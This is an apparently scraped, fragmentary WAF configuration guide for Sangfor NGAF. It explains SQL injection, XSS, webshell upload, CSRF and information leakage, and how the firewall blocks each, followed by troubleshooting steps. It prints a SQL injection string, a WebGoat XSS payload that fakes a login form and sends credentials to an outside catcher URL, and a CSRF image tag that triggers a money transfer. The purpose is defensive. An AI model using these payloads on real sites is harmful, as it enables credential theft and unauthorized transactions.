Professional Documents
Culture Documents
SANGFOR - NGAF - V8.0.5 - WAF Configuration Guide
SANGFOR - NGAF - V8.0.5 - WAF Configuration Guide
Version 8.0.5
Change Log
Date Change Description
2.1.3 Trojan.........................................................................................................................5
2.1.5 WEBSHELL.........................................................................................................................6
2.1.6 CSRF.........................................................................................................................6
2.1.12 Parameters.......................................................................................................................10
2.1.14 Password.......................................................................................................................12
2.1.15 Privilege.......................................................................................................................14
2.1.16 HTTP.......................................................................................................................16
Chapter 1 Background
So hacker will use this SQL to get more information such as input "sangfor' or '1'='1
"
Change SQL to" SELECT * FROM user_data WHERE last_name = 'sangfor' or '1'='1' "
Attack will input some HTML and Script in the box such as
"</form><script>function hack(){ XSSImage=new Image;
XSSImage.src="http://192.200.19.86:8080/webgoat/catcher?PROPERTY=yes&user="
+document.phish.user.value + "&password=" + document.phish.pass.value +
"";alert("Had this been a real attack... Your credentials were just stolen. User Name
= " + document.phish.user.value + " Password = " + document.phish.pass.value);}
</script><form name="phish"><br><br><HR><H3>This feature requires account
login:</H2><br><br>Enter Username:<br><input type="text"
name="user"><br>Enter Password:<br><input type="password" name =
"pass"><br><input type="submit" name="login" value="login"
onclick="hack()"></form><br><br><HR>
"
The code will run in the result and show a fake form to other user, when other user
input his username and password, this information will send to hacker's URL
" http://192.200.19.86:8080/webgoat/catcher?PROPERTY=yes&user="
Sangfor WAF will deny HTML and Script and record as follow:
2.1.3 Trojan
2.1.5 WEBSHELL
In some scenario website may need user upload file, hacker can upload webshell and
use other tool to visit this webshell and then control all website.
Hacker upload a webshell jsp and then visit this webshell and control all website.
2.1.6 CSRF
CSRF, cross-site request forgery, is a type of malicious exploit of a website where
unauthorized commands are transmitted from a user that the website trusts.
such as:
User A is visiting his online bank http://www.bank.com
Hack B send a mail to A , this mail contain a picture
<img src=”http://www.bank.com/transfer.php?accound=B&amount=1000”/>
When A check the mail and click this picture, A will request to this URL
" http://www.bank.com/transfer.php?accound=B&amount=1000"
and transfer to B money 1000
Sangfor WAF can deny this attack by HTTP header referrer field.
in follow configure, we can only
visit http://www.bank.com/transfer.php from http://www.bank.com
So even if user A click the picture and request to the transfer page ,the traffic will be
denied, because the request not from http://www.bank.com.
Website Administrator can use this function to set user can visit directory or page.
such as http://www.sangfor.com/manage/xxxx for administrator to manage
website http://www.sangfor.com/main/xxx for user to visit
we can configure as follow, just allow user visit http://www.sangfor.com/main/xxx
2.1.12 Parameters
This is a very intelligent function, NGAF WAF will study user's data.
Such as 95% user post letters and numbers to server ,but once someone post other
special character to server, WAF will think it is a abnormal action, administrator can
set deny or log event.
HTTP
http://192.200.19.86:8080/webgoat/uploads/1.jsp is a not available URL , but hacker
can try to get information from server response
Before enable Sangfor WAF ,we can see this website not have 1.jsp this file and the
website run by Apache Tomcat/7.0.27
After enable Sangfor WAF, we can get nothing from server response
2.1.14 Password
Sangfor WAF can detect FTP/HTTP password whether weak or strong, detect web-
access cleartext request inspection
even if user use weak password to login FTP/HTTP, WAF will not deny the traffic. But
can use defense against brute-force attack together.
2.1.15 Privilege
In this function, administrator can define which file can upload to the server, because
hacker may use upload function upload webshell or torjan.
File upload restriction by file type, if hacker upload cheat file type webshell or torjan,
traffic will be denied by webshell or torjan.
Lesson location: Malicious Execution-->Malicious File Execution
Administrator can configure URL access right ,define which URL can allow or deny.
If one URL allowed in this function, even if hacker attack to this URL, it will be allowed.
2.1.16 HTTP
Administrator can only allow some HTTP request method, avoid attack by other
request.
For test ,we not allow POST method and then use POST to request, Sangfor WAF deny
the traffic and record as follow.
Sangfor WAF can define which file can be download ,such as can't
download .bak/.sql/.mdb/...
For this test, we set to deny file with .jpg extension.
Chapter 3 Troubleshooting
NGAF Unable To Deny/Locate Attack
1) Make sure the traffic has crossed NGAF, especially NGAF deployed as mirror
mode, we need to make mirror port and guide traffic to NGAF.
2) Check the configuration
Destination IP must be the server real private IP ,not the public NAT ip.
Port must be the server service port.
3) Make sure database is updated to latest version
4) Make sure the option of send TCP reset message to reject request has checked
otherwise NGAF will can't deny attack.
5) Check the log and notice the action is allow or deny, if this is a real attack ,you
can change the database action based on rule ID.
6) Check global exclusion IP list and ensure troubleshooting option is disabled
else it will bypass the following IP.